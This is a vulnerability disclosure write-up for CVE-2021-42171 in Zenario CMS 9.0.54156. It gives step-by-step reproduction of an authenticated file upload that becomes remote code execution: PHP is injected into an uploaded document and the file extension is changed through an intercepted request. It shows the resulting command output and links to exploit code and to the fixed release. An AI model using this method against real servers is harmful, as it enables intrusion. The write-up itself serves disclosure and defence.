File upload to Remote Code Execution on Zenario CMS 9.0.54156

Product: Zenario 9.0.54156

Vulnerability Title: Authenticated File upload to RCE

Detailed description: It is possible to execute arbitrary commands on the webserver due to unsecure file upload functionality. An authenticated user with admin rights can upload a file then modify the file name to a executable extension.

Steps to reproduce:

1. Login to the admin page of Zenario CMS, which is http://server_ip/zenario/admin.php

2. Navigate to “Go to Organizer” and select “Documents”.

3. Select “Upload documents” and select file, in this case, I’m using a Microsoft Word (.docx) file.

Capture the upload request and modify file content. I’m adding PHP code into file content, and forward.

Back to browser, hit “Save”. The file is then uploaded to server.

4. Edit the file extension

Select “Edit document metadata”.

Zenario does not allow edit the file extension in the web interface. Okay, just “Save”.

Let’s check Burp Suite. This is request when click “Save”.

Decode param “box”:

{"tabs":{"details":{"edit_mode":{"on":1},"fields":{"document_extension":{"_was_hidden_before":true,"current_value":"~docx"},"document_title":{"current_value":""},"document_name":{"current_value":"~haha"},"checksum":{"_was_hidden_before":true,"current_value":"~q-DhB"},"date_uploaded":{"current_value":"~2021-09-28~2011~3A01~3A56"},"privacy":{"_display_value":"~Public","current_value":"~public"},"tags":{"_display_value":false,"current_value":""},"link_to_add_tags":{}}},"upload_image":{"edit_mode":{"on":true},"fields":{"thumbnail_grouping":{},"title":{"current_value":""},"thumbnail_image":{},"delete_thumbnail_image":{},"zenario_common_feature__upload":{"current_value":""}}},"extract":{"edit_mode":{"on":0},"fields":{"extract":{"current_value":"~No~20plain-text~20extract"},"extract_wordcount":{"current_value":0}}}},"_sync":{"cache_dir":"~ab_Bq1h5QFD_p2w6FAo5","password":"~UPWi0SkZ9P~2BAxaxftH5DvuxBqRx7xDG~2Fa1N1ldhwXAY~3D","iv":"~WU74B9mC0UAVlhLi~2FKU2eQ~3D~3D","session":false},"tab":"~details"}

Ok, so, I’m modify “docx” to “php”, and forward this request.

Boom!

4. Access to this file

Next, moving to “Action” and select “View public link”.

Got public link, access to this.

Exploit success!

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Code exploit: https://github.com/minhnq22/Zenario_CMS_9.0.54156_File_upload_to_Remote_code_execution

https://github.com/minhnq22/CVE-2021-42171
Discoverer: Minh Quang Nguyen / Hanoi, Vietnam.
Request CVE id: 28/09/2021.
Fixed: https://github.com/TribalSystems/Zenario/releases/tag/9.0.55141
CVE: CVE-2021–42171 (RCE)